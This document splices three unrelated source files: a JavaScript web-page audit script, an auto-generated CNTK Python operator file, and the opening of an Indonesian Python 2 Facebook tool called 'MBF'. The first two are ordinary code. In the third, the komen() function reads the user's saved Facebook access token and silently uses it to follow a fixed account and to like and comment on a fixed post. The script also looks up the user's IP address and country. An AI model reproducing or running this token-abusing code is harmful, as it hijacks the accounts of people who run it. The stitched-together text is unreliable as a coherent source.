synchJsScript.forEach(function (script) {
checkDomain(script)
});
return [Math.max(0, 100 - score), offending]
}
function thirdPartyAsyncJs() {
var score = 0;
var offending = [];
function is3rdParty(url) {
var hostname = getHostname(url);
var re;
for (var i = 0; i < patterns.length; i++) {
re = new RegExp(patterns[i]);
if (re.test(hostname)) {
return true;
}
}
return false;
}
thirdPartyScript.forEach(function (script) {
if (is3rdParty(script)) {
offending.push(script);
score += 10;
}
})
return [Math.max(0, 100 - score), offending]
}
return {
'performanceScalingImages': avoidScalingImages(),
'performanceCssPrint': cssPrint(),
'performanceFastRender': fastRender(),
'performanceGoogleTagManager': googleTagManager(),
'performanceInlineCss': inlineCss(),
'performanceJQuery': pageJquery(),
'performanceSPOF': spof(),
'performanceThirdPartyAsyncJs': thirdPartyAsyncJs()
}
}
function checkInfo() {
function browser(){
var match = window.navigator.userAgent.match(browsers_regex);
return match ? match[1] + ' ' + match[2] : 'unknown';
}
function domDepth(document) {
function numParents(elem) {
var n = 0;
if (elem.parentNode) {
while ((elem = elem.parentNode)) {
n++;
}
}
return n;
}
var allElems = document.getElementsByTagName('*');
var allElemsLen = allElems.length;
var totalParents = 0;
var maxParents = 0;
while (allElemsLen--) {
var parents = numParents(allElems[allElemsLen]);
if (parents > maxParents) {
maxParents = parents;
}
totalParents += parents;
}
var average = totalParents / allElems.length;
return {
avg: Math.round(average),
max: maxParents
};
}
function storageSize(storage) {
if (storage) {
var keys = storage.length || Object.keys(storage).length;
var bytes = 0;
for (var i = 0; i < keys; i++) {
var key = storage.key(i);
var val = storage.getItem(key);
bytes += key.length + val.length;
}
return bytes;
} else {
return 0;
}
}
function metadataDescription(){
var description = document.querySelector('meta[name="description"]');
var og = document.querySelector('meta[property="og:description"]');
if (description) {
return description.getAttribute('content');
} else if (og) {
return og.getAttribute('content');
} else {
return '';
}
}
function isResponsive(){
var isResponsive = true;
var bodyScrollWidth = document.body.scrollWidth;
var windowInnerWidth = window.innerWidth;
var nodes = document.body.children;
if (bodyScrollWidth > windowInnerWidth) {
isResponsive = false;
}
for (var i in nodes) {
if (nodes[i].scrollWidth > windowInnerWidth) {
isResponsive = false;
}
}
return isResponsive;
}
function serviceWorker(){
if ('serviceWorker' in navigator) {
// Only report activated service workers
if (navigator.serviceWorker.controller) {
if (navigator.serviceWorker.controller.state === 'activated') {
return navigator.serviceWorker.controller.scriptURL;
} else return false;
} else {
return false;
}
} else {
return false;
}
}
function storageSize(storage) {
var keys = storage.length || Object.keys(storage).length;
var bytes = 0;
for (var i = 0; i < keys; i++) {
var key = storage.key(i);
var val = storage.getItem(key);
bytes += key.length + val.length;
}
return bytes;
}
function windowSize() {
var width =
window.innerWidth ||
document.documentElement.clientWidth ||
document.body.clientWidth;
var height =
window.innerHeight ||
document.documentElement.clientHeight ||
document.body.clientHeight;
return width + 'x' + height;
}
return {
amp: amp(),
browser: browser(),
documentHeight: Math.max(document.body.scrollHeight,document.body.offsetHeight, document.documentElement.clientHeight,document.documentElement.scrollHeight,document.documentElement.offsetHeight),
documentWidth: Math.max(document.body.scrollWidth,document.body.offsetWidth,document.documentElement.clientWidth,document.documentElement.scrollWidth,document.documentElement.offsetWidth),
connectionType: connectionType,
title: docTitle,
domDepth: domDepth(document),
domElements: document.getElementsByTagName('*').length,
head: {jssync: synchJsScript,jsasync: getAsynchJSFiles(docHead),css: getCSSFiles},
iframes: document.getElementsByTagName('iframe').length,
jsframework: {
angular: window.angular ? window.angular.version.full : false,
backbone: window.Backbone ? window.Backbone.VERSION : false,
preact: window.preact ? true : false,
vue: window.Vue ? true : false
},
storageSize: storageSize(window.localStorage),
networkConncetionType: window.navigator.connection ? window.navigator.connection.effectiveType : 'unknown',
resourceHint: {
dnsprefetch: getResourceHintsHrefs('dns-prefetch'),
preconnect: getResourceHintsHrefs('preconnect'),
prefetch: getResourceHintsHrefs('prefetch'),
prerender: getResourceHintsHrefs('prerender')
},
isResponsive: isResponsive(),
scripts: scripts.length,
serializedDomSize: document.body.innerHTML.length,
serviceWorker: serviceWorker(),
sessionStorageSize: storageSize(window.sessionStorage),
thirdParty: {
boomerang: window.BOOMR ? window.BOOMR.version : false,
facebook: window.FB ? true : false,
gtm: window.google_tag_manager ? true : false,
ga: window.ga ? true : false,
jquery: window.jQuery ? window.jQuery.fn.jquery : false,
newrelic: window.newrelic ? true : false,
matomo: window.Piwik ? true : window.Matomo ? true : false
},
userTiming: {
marks: measures.length,
measures: marks.length
},
windowSize: windowSize()
}
}
function checkPrivacy(){
function survilance() {
var score = 100;
var offending = [];
var offenders = ['.google.', 'facebook.com', 'youtube.', 'yahoo.com'];
for (var i = 0; i < offenders.length; i++) {
if (docDomain.indexOf(offenders[i]) > -1) {
score = 0;
offending.push(docDomain);
}
}
return [score, offending]
}
return {
amp: [amp() ? 0 : 100, amp()],
facebook: [window.FB ? 0 : 100, window.FB],
ga: [window.ga && window.ga.create ? 0 : 100, window.ga && window.ga.create],
https: [docUrl.indexOf('https://') === -1 ? 0 : 100, new URL(docUrl).protocol],
survilance: survilance(),
youtube: [window.YT? 0 : 100, window.YT]
}
}
function checkTiming() {
function GetFirstPaint() {
// Try the standardized paint timing api
var win=window;
var doc = win.document;
var firstPaint = undefined
try {
var entries = performanceObj.getEntriesByType('paint');
for (var i = 0; i < entries.length; i++) {
if (entries[i]['name'] == 'first-paint') {
navStart = performanceObj.getEntriesByType("navigation")[0].startTime;
firstPaint = entries[i].startTime - navStart;
break;
}
}
} catch(e) {
}
// If the browser supports a first paint event, just use what the browser reports
if (firstPaint === undefined && 'msFirstPaint' in win.performance.timing)
firstPaint = performanceObj.timing.msFirstPaint - navStart;
// For browsers that don't support first-paint or where we get insane values,
// use the time of the last non-async script or css from the head.
if (firstPaint === undefined || firstPaint < 0 || firstPaint > 120000) {
firstPaint = performanceObj.timing.responseStart - navStart;
var headURLs = {};
var headElements = doc.getElementsByTagName('head')[0].children;
for (var i = 0; i < headElements.length; i++) {
var el = headElements[i];
if (el.tagName == 'SCRIPT' && el.src && !el.async)
headURLs[el.src] = true;
if (el.tagName == 'LINK' && el.rel == 'stylesheet' && el.href)
headURLs[el.href] = true;
}
var requests = performanceObj.getEntriesByType("resource");
var doneCritical = false;
for (var j = 0; j < requests.length; j++) {
if (!doneCritical &&
headURLs[requests[j].name] &&
(requests[j].initiatorType == 'script' || requests[j].initiatorType == 'link')) {
var requestEnd = requests[j].responseEnd;
if (firstPaint === undefined || requestEnd > firstPaint)
firstPaint = requestEnd;
} else {
doneCritical = true;
}
}
}
return Number(Math.max(firstPaint, 0).toFixed(0));
};
function fullyLoaded(){
// this wierdo checks last loaded resource, e.g. recuring requests
// influence on this metric
if (performanceObj && performanceObj.getEntriesByType) {
var resources = performanceObj.getEntriesByType('resource');
var max = 0;
for (var i = 1, len = resources.length; i < len; i++) {
if (resources[i].responseEnd > max) {
max = resources[i].responseEnd;
}
}
return max;
} else {
return -1;
}
}
function RUMSpeedIndex(win) {
win = win || window;
var doc = win.document;
/****************************************************************************
Support Routines
****************************************************************************/
// Get the rect for the visible portion of the provided DOM element
function GetElementViewportRect(el) {
var intersect = false;
if (el.getBoundingClientRect) {
var elRect = el.getBoundingClientRect();
intersect = {'top': Math.max(elRect.top, 0),
'left': Math.max(elRect.left, 0),
'bottom': Math.min(elRect.bottom, (win.innerHeight || doc.documentElement.clientHeight)),
'right': Math.min(elRect.right, (win.innerWidth || doc.documentElement.clientWidth))};
if (intersect.bottom <= intersect.top ||
intersect.right <= intersect.left) {
intersect = false;
} else {
intersect.area = (intersect.bottom - intersect.top) * (intersect.right - intersect.left);
}
}
return intersect;
};
// Check a given element to see if it is visible
function CheckElement(el, url) {
if (url) {
var rect = GetElementViewportRect(el);
if (rect) {
rects.push({'url': url,
'area': rect.area,
'rect': rect});
}
}
};
// Get the visible rectangles for elements that we care about
function GetRects() {
// Walk all of the elements in the DOM (try to only do this once)
var elements = doc.getElementsByTagName('*');
var re = /url\(.*(http.*)\)/ig;
for (var i = 0; i < elements.length; i++) {
var el = elements[i];
var style = win.getComputedStyle(el);
// check for Images
if (el.tagName == 'IMG') {
CheckElement(el, el.src);
}
// Check for background images
if (style['background-image']) {
re.lastIndex = 0;
var matches = re.exec(style['background-image']);
if (matches && matches.length > 1)
CheckElement(el, matches[1].replace('"', ''));
}
// recursively walk any iFrames
if (el.tagName == 'IFRAME') {
try {
var rect = GetElementViewportRect(el);
if (rect) {
var tm = RUMSpeedIndex(el.contentWindow);
if (tm) {
rects.push({'tm': tm,
'area': rect.area,
'rect': rect});
}
}
} catch(e) {
}
}
}
};
// Get the time at which each external resource loaded
function GetRectTimings() {
var timings = {};
var requests = win.performance.getEntriesByType("resource");
for (var i = 0; i < requests.length; i++)
timings[requests[i].name] = requests[i].responseEnd;
for (var j = 0; j < rects.length; j++) {
if (!('tm' in rects[j]))
rects[j].tm = timings[rects[j].url] !== undefined ? timings[rects[j].url] : 0;
}
};
// Sort and group all of the paint rects by time and use them to
// calculate the visual progress
var CalculateVisualProgress = function() {
var paints = {'0':0};
var total = 0;
for (var i = 0; i < rects.length; i++) {
var tm = firstPaint;
if ('tm' in rects[i] && rects[i].tm > firstPaint)
tm = rects[i].tm;
if (paints[tm] === undefined)
paints[tm] = 0;
paints[tm] += rects[i].area;
total += rects[i].area;
}
// Add a paint area for the page background (count 10% of the pixels not
// covered by existing paint rects.
var pixels = Math.max(doc.documentElement.clientWidth, win.innerWidth || 0) *
Math.max(doc.documentElement.clientHeight, win.innerHeight || 0);
if (pixels > 0 ) {
pixels = Math.max(pixels - total, 0) * pageBackgroundWeight;
if (paints[firstPaint] === undefined)
paints[firstPaint] = 0;
paints[firstPaint] += pixels;
total += pixels;
}
// Calculate the visual progress
if (total) {
for (var time in | |
<reponame>Acidburn0zzz/CNTK<filename>contrib/Python/cntk/cntk1_ops.py
# This file is auto-generated by _fetch_ops.py.
from cntk.graph import ComputationNode, InputComputationNodeBase, ImageInputComputationNodeBase
class Print(ComputationNode):
def __init__(self, value, format='', name='Print', var_name=None):
super(Print, self).__init__(params=['value', 'format'], name=name, var_name=var_name)
self.value = value
self.format = format
self.params_with_defaults = ['format']
class Debug(ComputationNode):
def __init__(self, value, say='', enabled=True, name='Debug', var_name=None):
super(Debug, self).__init__(params=['value', 'say', 'enabled'], name=name, var_name=var_name)
self.value = value
self.say = say
self.enabled = enabled
self.params_with_defaults = ['say', 'enabled']
class Format(ComputationNode):
def __init__(self, value, format, name='Format', var_name=None):
super(Format, self).__init__(params=['value', 'format'], name=name, var_name=var_name)
self.value = value
self.format = format
self.params_with_defaults = []
class Replace(ComputationNode):
def __init__(self, s, from_, to, name='Replace', var_name=None):
super(Replace, self).__init__(params=['s', 'from_', 'to'], name=name, var_name=var_name)
self.s = s
self.from_ = from_
self.to = to
self.params_with_defaults = []
class Substr(ComputationNode):
def __init__(self, s, begin, num, name='Substr', var_name=None):
super(Substr, self).__init__(params=['s', 'begin', 'num'], name=name, var_name=var_name)
self.s = s
self.begin = begin
self.num = num
self.params_with_defaults = []
class Chr(ComputationNode):
def __init__(self, c, name='Chr', var_name=None):
super(Chr, self).__init__(params=['c'], name=name, var_name=var_name)
self.c = c
self.params_with_defaults = []
class Length(ComputationNode):
def __init__(self, x, name='Length', var_name=None):
super(Length, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Ceil(ComputationNode):
def __init__(self, x, name='Ceil', var_name=None):
super(Ceil, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Round(ComputationNode):
def __init__(self, x, name='Round', var_name=None):
super(Round, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Sign(ComputationNode):
def __init__(self, x, name='Sign', var_name=None):
super(Sign, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Min(ComputationNode):
def __init__(self, a, b, name='Min', var_name=None):
super(Min, self).__init__(params=['a', 'b'], name=name, var_name=var_name)
self.a = a
self.b = b
self.params_with_defaults = []
class Max(ComputationNode):
def __init__(self, a, b, name='Max', var_name=None):
super(Max, self).__init__(params=['a', 'b'], name=name, var_name=var_name)
self.a = a
self.b = b
self.params_with_defaults = []
class Fac(ComputationNode):
def __init__(self, n, name='Fac', var_name=None):
super(Fac, self).__init__(params=['n'], name=name, var_name=var_name)
self.n = n
self.params_with_defaults = []
class LearnableParameter(ComputationNode):
def __init__(self, rows, cols, learningRateMultiplier=1.0, init='uniform', initValueScale=1, value=0, initFromFilePath='', initOnCPUOnly=True, randomSeed=-1, name='LearnableParameter', var_name=None):
super(LearnableParameter, self).__init__(params=['rows', 'cols', 'learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed'], name=name, var_name=var_name)
self.rows = rows
self.cols = cols
self.learningRateMultiplier = learningRateMultiplier
self.init = init
self.initValueScale = initValueScale
self.value = value
self.initFromFilePath = initFromFilePath
self.initOnCPUOnly = initOnCPUOnly
self.randomSeed = randomSeed
self.params_with_defaults = ['learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed']
class ParameterTensor(ComputationNode):
def __init__(self, dims, learningRateMultiplier=1.0, init='uniform', initValueScale=1, value=0, initFromFilePath='', initOnCPUOnly=True, randomSeed=-1, name='ParameterTensor', var_name=None):
super(ParameterTensor, self).__init__(params=['dims', 'learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed'], name=name, var_name=var_name)
self.dims = dims
self.learningRateMultiplier = learningRateMultiplier
self.init = init
self.initValueScale = initValueScale
self.value = value
self.initFromFilePath = initFromFilePath
self.initOnCPUOnly = initOnCPUOnly
self.randomSeed = randomSeed
self.params_with_defaults = ['learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed']
class Input(InputComputationNodeBase):
def __init__(self, dims, tag='feature', name='Input', var_name=None):
super(Input, self).__init__(params=['dims', 'tag'], name=name, var_name=var_name)
self.dims = dims
self.tag = tag
self.params_with_defaults = ['tag']
class SparseInput(InputComputationNodeBase):
def __init__(self, dims, tag='feature', name='SparseInput', var_name=None):
super(SparseInput, self).__init__(params=['dims', 'tag'], name=name, var_name=var_name)
self.dims = dims
self.tag = tag
self.params_with_defaults = ['tag']
class ImageInput(ImageInputComputationNodeBase):
def __init__(self, imageWidth, imageHeight, imageChannels, imageLayout='CHW', tag='feature', name='ImageInput', var_name=None):
super(ImageInput, self).__init__(params=['imageWidth', 'imageHeight', 'imageChannels', 'imageLayout', 'tag'], name=name, var_name=var_name)
self.imageWidth = imageWidth
self.imageHeight = imageHeight
self.imageChannels = imageChannels
self.imageLayout = imageLayout
self.tag = tag
self.params_with_defaults = ['imageLayout', 'tag']
class SparseImageInput(ImageInputComputationNodeBase):
def __init__(self, imageWidth, imageHeight, imageChannels, imageLayout='CHW', tag='feature', name='SparseImageInput', var_name=None):
super(SparseImageInput, self).__init__(params=['imageWidth', 'imageHeight', 'imageChannels', 'imageLayout', 'tag'], name=name, var_name=var_name)
self.imageWidth = imageWidth
self.imageHeight = imageHeight
self.imageChannels = imageChannels
self.imageLayout = imageLayout
self.tag = tag
self.params_with_defaults = ['imageLayout', 'tag']
class EnvironmentInput(ComputationNode):
def __init__(self, propertyName, name='EnvironmentInput', var_name=None):
super(EnvironmentInput, self).__init__(params=['propertyName'], name=name, var_name=var_name)
self.propertyName = propertyName
self.params_with_defaults = []
class PastValue(ComputationNode):
def __init__(self, dims, input, timeStep=1, defaultHiddenActivation=0.1, name='PastValue', var_name=None):
super(PastValue, self).__init__(params=['dims', 'input', 'timeStep', 'defaultHiddenActivation'], name=name, var_name=var_name)
self.dims = dims
self.input = input
self.timeStep = timeStep
self.defaultHiddenActivation = defaultHiddenActivation
self.params_with_defaults = ['timeStep', 'defaultHiddenActivation']
class FutureValue(ComputationNode):
def __init__(self, dims, input, timeStep=1, defaultHiddenActivation=0.1, name='FutureValue', var_name=None):
super(FutureValue, self).__init__(params=['dims', 'input', 'timeStep', 'defaultHiddenActivation'], name=name, var_name=var_name)
self.dims = dims
self.input = input
self.timeStep = timeStep
self.defaultHiddenActivation = defaultHiddenActivation
self.params_with_defaults = ['timeStep', 'defaultHiddenActivation']
class Shift(ComputationNode):
def __init__(self, input, fromOffset, boundaryValue, boundaryMode=-1, dim=-1, name='Shift', var_name=None):
super(Shift, self).__init__(params=['input', 'fromOffset', 'boundaryValue', 'boundaryMode', 'dim'], name=name, var_name=var_name)
self.input = input
self.fromOffset = fromOffset
self.boundaryValue = boundaryValue
self.boundaryMode = boundaryMode
self.dim = dim
self.params_with_defaults = ['boundaryMode', 'dim']
class RowSlice(ComputationNode):
def __init__(self, startIndex, numRows, input, name='RowSlice', var_name=None):
super(RowSlice, self).__init__(params=['startIndex', 'numRows', 'input'], name=name, var_name=var_name)
self.startIndex = startIndex
self.numRows = numRows
self.input = input
self.params_with_defaults = []
class RowRepeat(ComputationNode):
def __init__(self, input, numRepeats, name='RowRepeat', var_name=None):
super(RowRepeat, self).__init__(params=['input', 'numRepeats'], name=name, var_name=var_name)
self.input = input
self.numRepeats = numRepeats
self.params_with_defaults = []
class RowStack(ComputationNode):
def __init__(self, inputs, name='RowStack', var_name=None):
super(RowStack, self).__init__(params=['inputs'], name=name, var_name=var_name)
self.inputs = inputs
self.params_with_defaults = []
class Reshape(ComputationNode):
def __init__(self, input, numRows, imageWidth=0, imageHeight=0, imageChannels=0, name='Reshape', var_name=None):
super(Reshape, self).__init__(params=['input', 'numRows', 'imageWidth', 'imageHeight', 'imageChannels'], name=name, var_name=var_name)
self.input = input
self.numRows = numRows
self.imageWidth = imageWidth
self.imageHeight = imageHeight
self.imageChannels = imageChannels
self.params_with_defaults = ['imageWidth', 'imageHeight', 'imageChannels']
class NewReshape(ComputationNode):
def __init__(self, input, dims, beginDim=0, endDim=0, name='NewReshape', var_name=None):
super(NewReshape, self).__init__(params=['input', 'dims', 'beginDim', 'endDim'], name=name, var_name=var_name)
self.input = input
self.dims = dims
self.beginDim = beginDim
self.endDim = endDim
self.params_with_defaults = ['beginDim', 'endDim']
class TransposeDimensions(ComputationNode):
def __init__(self, input, dim1, dim2, name='TransposeDimensions', var_name=None):
super(TransposeDimensions, self).__init__(params=['input', 'dim1', 'dim2'], name=name, var_name=var_name)
self.input = input
self.dim1 = dim1
self.dim2 = dim2
self.params_with_defaults = []
class Times(ComputationNode):
def __init__(self, A, B, outputRank=1, name='Times', var_name=None):
super(Times, self).__init__(params=['A', 'B', 'outputRank'], name=name, var_name=var_name)
self.A = A
self.B = B
self.outputRank = outputRank
self.params_with_defaults = ['outputRank']
class Logistic(ComputationNode):
def __init__(self, label, probability, name='Logistic', var_name=None):
super(Logistic, self).__init__(params=['label', 'probability'], name=name, var_name=var_name)
self.label = label
self.probability = probability
self.params_with_defaults = []
class WeightedLogistic(ComputationNode):
def __init__(self, label, probability, instanceWeight, name='WeightedLogistic', var_name=None):
super(WeightedLogistic, self).__init__(params=['label', 'probability', 'instanceWeight'], name=name, var_name=var_name)
self.label = label
self.probability = probability
self.instanceWeight = instanceWeight
self.params_with_defaults = []
class ReconcileMBLayout(ComputationNode):
def __init__(self, dataInput, layoutInput, name='ReconcileMBLayout', var_name=None):
super(ReconcileMBLayout, self).__init__(params=['dataInput', 'layoutInput'], name=name, var_name=var_name)
self.dataInput = dataInput
self.layoutInput = layoutInput
self.params_with_defaults = []
class Convolution(ComputationNode):
def __init__(self, weightNode, inputValueNode, kernelWidth, kernelHeight, outputChannels, horizontalSubsample, verticalSubsample, zeroPadding=False, maxTempMemSizeInSamples=0, imageLayout='CHW', name='Convolution', var_name=None):
super(Convolution, self).__init__(params=['weightNode', 'inputValueNode', 'kernelWidth', 'kernelHeight', 'outputChannels', 'horizontalSubsample', 'verticalSubsample', 'zeroPadding', 'maxTempMemSizeInSamples', 'imageLayout'], name=name, var_name=var_name)
self.weightNode = weightNode
self.inputValueNode = inputValueNode
self.kernelWidth = kernelWidth
self.kernelHeight = kernelHeight
self.outputChannels = outputChannels
self.horizontalSubsample = horizontalSubsample
self.verticalSubsample = verticalSubsample
self.zeroPadding = zeroPadding
self.maxTempMemSizeInSamples = maxTempMemSizeInSamples
self.imageLayout = imageLayout
self.params_with_defaults = ['zeroPadding', 'maxTempMemSizeInSamples', 'imageLayout']
class MaxPooling(ComputationNode):
def __init__(self, input, windowWidth, windowHeight, horizontalSubsample, verticalSubsample, imageLayout='CHW', name='MaxPooling', var_name=None):
super(MaxPooling, self).__init__(params=['input', 'windowWidth', 'windowHeight', 'horizontalSubsample', 'verticalSubsample', 'imageLayout'], name=name, var_name=var_name)
self.input = input
self.windowWidth = windowWidth
self.windowHeight = windowHeight
self.horizontalSubsample = horizontalSubsample
self.verticalSubsample = verticalSubsample
self.imageLayout = imageLayout
self.params_with_defaults = ['imageLayout']
class AveragePooling(ComputationNode):
def __init__(self, input, windowWidth, windowHeight, horizontalSubsample, verticalSubsample, imageLayout='CHW', name='AveragePooling', var_name=None):
super(AveragePooling, self).__init__(params=['input', 'windowWidth', 'windowHeight', 'horizontalSubsample', 'verticalSubsample', 'imageLayout'], name=name, var_name=var_name)
self.input = input
self.windowWidth = windowWidth
self.windowHeight = windowHeight
self.horizontalSubsample = horizontalSubsample
self.verticalSubsample = verticalSubsample
self.imageLayout = imageLayout
self.params_with_defaults = ['imageLayout']
class BatchNormalization(ComputationNode):
def __init__(self, input, scale, bias, runMean, runInvStdDev, eval, spatial, normalizationTimeConstant=0, epsilon=1e-05, useCntkEngine=True, imageLayout='CHW', name='BatchNormalization', var_name=None):
super(BatchNormalization, self).__init__(params=['input', 'scale', 'bias', 'runMean', 'runInvStdDev', 'eval', 'spatial', 'normalizationTimeConstant', 'epsilon', 'useCntkEngine', 'imageLayout'], name=name, var_name=var_name)
self.input = input
self.scale = scale
self.bias = bias
self.runMean = runMean
self.runInvStdDev = runInvStdDev
self.eval = eval
self.spatial = spatial
self.normalizationTimeConstant = normalizationTimeConstant
self.epsilon = epsilon
self.useCntkEngine = useCntkEngine
self.imageLayout = imageLayout
self.params_with_defaults = ['normalizationTimeConstant', 'epsilon', 'useCntkEngine', 'imageLayout']
class Abs(ComputationNode):
def __init__(self, x, name='Abs', var_name=None):
super(Abs, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class ClassBasedCrossEntropyWithSoftmax(ComputationNode):
def __init__(self, labelClassDescriptorVectorSequence, mainInputInfo, mainWeight, classLogProbsBeforeSoftmax, name='ClassBasedCrossEntropyWithSoftmax', var_name=None):
super(ClassBasedCrossEntropyWithSoftmax, self).__init__(params=['labelClassDescriptorVectorSequence', 'mainInputInfo', 'mainWeight', 'classLogProbsBeforeSoftmax'], name=name, var_name=var_name)
self.labelClassDescriptorVectorSequence = labelClassDescriptorVectorSequence
self.mainInputInfo = mainInputInfo
self.mainWeight = mainWeight
self.classLogProbsBeforeSoftmax = classLogProbsBeforeSoftmax
self.params_with_defaults = []
class ColumnElementTimes(ComputationNode):
def __init__(self, aVectorSequence, anotherVectorSequence, name='ColumnElementTimes', var_name=None):
super(ColumnElementTimes, self).__init__(params=['aVectorSequence', 'anotherVectorSequence'], name=name, var_name=var_name)
self.aVectorSequence = aVectorSequence
self.anotherVectorSequence = anotherVectorSequence
self.params_with_defaults = []
class CosDistance(ComputationNode):
def __init__(self, aVectorSequence, anotherVectorSequence, name='CosDistance', var_name=None):
super(CosDistance, self).__init__(params=['aVectorSequence', 'anotherVectorSequence'], name=name, var_name=var_name)
self.aVectorSequence = aVectorSequence
self.anotherVectorSequence = anotherVectorSequence
self.params_with_defaults = []
class CosDistanceWithNegativeSamples(ComputationNode):
def __init__(self, aVectorSequence, anotherVectorSequence, numShifts, numNegSamples, name='CosDistanceWithNegativeSamples', var_name=None):
super(CosDistanceWithNegativeSamples, self).__init__(params=['aVectorSequence', 'anotherVectorSequence', 'numShifts', 'numNegSamples'], name=name, var_name=var_name)
self.aVectorSequence = aVectorSequence
self.anotherVectorSequence = anotherVectorSequence
self.numShifts = numShifts
self.numNegSamples = numNegSamples
self.params_with_defaults = []
class Cosine(ComputationNode):
def __init__(self, x, name='Cosine', var_name=None):
super(Cosine, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class CrossEntropy(ComputationNode):
def __init__(self, refProbVectorSequence, outProbVectorSequence, name='CrossEntropy', var_name=None):
super(CrossEntropy, self).__init__(params=['refProbVectorSequence', 'outProbVectorSequence'], name=name, var_name=var_name)
self.refProbVectorSequence = refProbVectorSequence
self.outProbVectorSequence = outProbVectorSequence
self.params_with_defaults = []
class CrossEntropyWithSoftmax(ComputationNode):
def __init__(self, labelVectorSequence, outProbVectorSequence, name='CrossEntropyWithSoftmax', var_name=None):
super(CrossEntropyWithSoftmax, self).__init__(params=['labelVectorSequence', 'outProbVectorSequence'], name=name, var_name=var_name)
self.labelVectorSequence = labelVectorSequence
self.outProbVectorSequence = outProbVectorSequence
self.params_with_defaults = []
class DiagTimes(ComputationNode):
def __init__(self, diagonalMatrixAsColumnVector, matrix, name='DiagTimes', var_name=None):
super(DiagTimes, self).__init__(params=['diagonalMatrixAsColumnVector', 'matrix'], name=name, var_name=var_name)
| |
"#-*-coding:utf-8-*-
import requests,bs4,sys,os,subprocess
import requests,sys,random,time,re,base64,json
reload(sys)
sys.setdefaultencoding("utf-8")
from multiprocessing.pool import ThreadPool
if ("linux" in sys.platform.lower()):
##### WARNA #####
P = '\033[0;97m' # Putih
M = '\033[0;91m' # Merah
H = '\033[0;92m' # Hijau
K = '\033[0;93m' # Kuning
B = '\033[0;94m' # Biru
U = '\033[0;95m' # Ungu
O = '\033[0;96m' # Biru Muda
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
host="https://mbasic.facebook.com"
##### RANDOM #####
ua = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'
##### LOGO #####
logo = """
__ __ ____ _____
| \/ | __ )| ___| *au : rozhak
| |\/| | _ \| |_ *fb : fb.com/rozhak.xyz
| | | | |_) | _| *gh : github.com/r0zhak
|_| |_|____/|_| *yt : youtube.com/rozhakid
"""
ips=None
try:
b=requests.get("https://api.ipify.org").text.strip()
ips=requests.get("https://ipapi.com/ip_api.php?ip="+b,headers={"Referer":"https://ip-api.com/","Content-Type":"application/json; charset=utf-8","User-Agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}).json()["country_name"].lower()
except:
ips=None
uas=None
if os.path.exists(".browser"):
if os.path.getsize(".browser") !=0:
uas=open(".browser").read().strip()
mbasic_h={"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
free_h={"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
mfb_h={'Host': 'm.facebook.<EMAIL>', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent':ua, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
##### CLEAR #####
def clear():
if " linux" in sys.platform.lower():
os.system("clear")
elif "win" in sys.platform.lower():
os.system("cls")
else:os.system("clear")
##### KELUAR #####
def keluar():
print ( ' *! Keluar')
os.sys.exit()
##### JALAN #####
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
pantun = random.choice(["mantap.",
keren.",
boleh juga."])
def komen(): # Boleh Di Tanbahin Jangan Di Ganti #
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
login()
kom = '👍\n'+pantun
kom2 = '👍\n'+pantun
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100030294384163/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/likes?summary=true&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/comments/?message=Keren Bang ❤️&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/likes?summary=true&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/565965684423239/likes?summary=true&access_token=' + toket)
print (' *! Login Berhasil')
menu()
##### LOGIN #####
def login():
os.system('clear')
print logo
